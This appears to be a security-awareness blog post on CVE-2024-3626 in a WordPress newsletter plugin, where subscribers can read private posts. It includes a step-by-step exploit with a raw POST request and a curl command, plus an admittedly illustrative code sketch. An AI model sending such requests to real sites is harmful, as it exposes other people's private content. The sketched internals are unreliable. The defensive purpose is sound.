CVE-2024-3626 - How a Simple WordPress Plugin Bug Exposed Private and Protected Posts

Protecting private data on your WordPress website is very important, but sometimes even popular plugins can introduce serious weaknesses. This is exactly what happened with the Email Subscribers by Icegram Express plugin – a tool relied upon by thousands of website owners for newsletters, automation, and marketing. In this post, we dive deep into CVE-2024-3626, showing how a missing security check opened the door for attackers to access private and password-protected posts, even with very limited permissions. We'll explore what happened, how it was exploited, and what you should do about it.

What is CVE-2024-3626?

- Plugin Affected: Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce

Vulnerable Versions: Up to and including 5.7.17

- Vulnerability Type: Insecure Direct Object Reference (IDOR) / Missing Capability Check
- CVE ID: CVE-2024-3626

Summary:
The plugin fails to properly check user permissions in the get_template_content function. This means that _any authenticated user_ (even just a "subscriber") can use this function to fetch the full content of posts — even those marked "private" or protected by a password.

How the Vulnerability Works

Normally, private and password-protected posts in WordPress are visible only to editors, admins, or those who know the password. But this plugin exposes a REST API endpoint in its admin-ajax handler—without confirming if the user has proper access.

Imagine a function like this in the plugin

// Inside includes/admin/class-es-admin-ajax-handler.php
public static function get_template_content() {
    $post_id = intval($_POST['post_id']);
    $post = get_post($post_id);

    // NO CAPABILITY CHECK!
    if ($post) {
        echo $post->post_content;
    } else {
        echo 'Invalid post';
    }
    exit;
}

This function can be called by visiting /wp-admin/admin-ajax.php and posting a post_id parameter with any integer value. There's no check to verify if the logged-in user is allowed to see that post. It's enough just to be logged in — even as a basic "subscriber".

Exploiting CVE-2024-3626: Step-by-Step

To use this exploit, an attacker needs to be logged in with at least "subscriber" access. Many sites allow anyone to register as a subscriber!

Step 1: Register as a Subscriber

Go to the site's registration page and sign up for an account.

Step 2: Find Private Posts

Attackers can guess post IDs (they are usually sequential integers), or use SEO tools, sitemaps, or other plugins' leaks to find them.

With your subscriber account, send this POST request

POST /wp-admin/admin-ajax.php?action=es_get_post_content HTTP/1.1
Host: vulnerable-site.com
Cookie: [YOUR LOGGED-IN COOKIE]
Content-Type: application/x-www-form-urlencoded

post_id=123

Example using curl

curl -b 'wordpress_logged_in_...' \
     -d 'action=es_get_post_content&post_id=123' \
     https://vulnerable-site.com/wp-admin/admin-ajax.php

Result:
The response will be the full contents of post ID 123—even if it was set to private or password-protected!

Why Is This Bad?

- Confidential information (like meeting notes, unreleased content, personal data) may be posted as private or protected posts.

How Was This Fixed?

Icegram Express fixed the vulnerability in version 5.7.18 by adding a proper capability check. Only users who are allowed to see the post in WordPress now get access to the content through the AJAX endpoint.

Corrected Function Example

// Before printing content, check user can read post:
if (current_user_can('read_post', $post_id)) {
    echo $post->post_content;
} else {
    echo 'You are not allowed to access this content';
}

1. Update the Plugin!

Upgrade Email Subscribers by Icegram Express to at least version 5.7.18 right away.
- Plugin on WordPress.org

2. Review Private Content

Consider whether any sensitive data may have been at risk, and audit past access and user registrations.

3. Limit Subscriber Registrations

If you don't need user registrations, disable them. Always be cautious with user roles.

References

- CVE-2024-3626 Listing
- Wordfence Blog - Icegram Express Vulnerability *(if available)*
- Plugin's Changelog

Conclusion

CVE-2024-3626 is a striking reminder that even widely used WordPress plugins can introduce big risks because of simple coding mistakes. Never assume your "private" data is safe just because you marked it as private—always keep your plugins updated, monitor your site's security, and minimize the number of users who have any kind of access.

If you run this plugin, update now and stay safe.

*Written exclusively for your security awareness by ChatGPT (2024).*

Timeline

Published on: 05/23/2024 06:15:10 UTC
Last modified on: 05/24/2024 01:15:30 UTC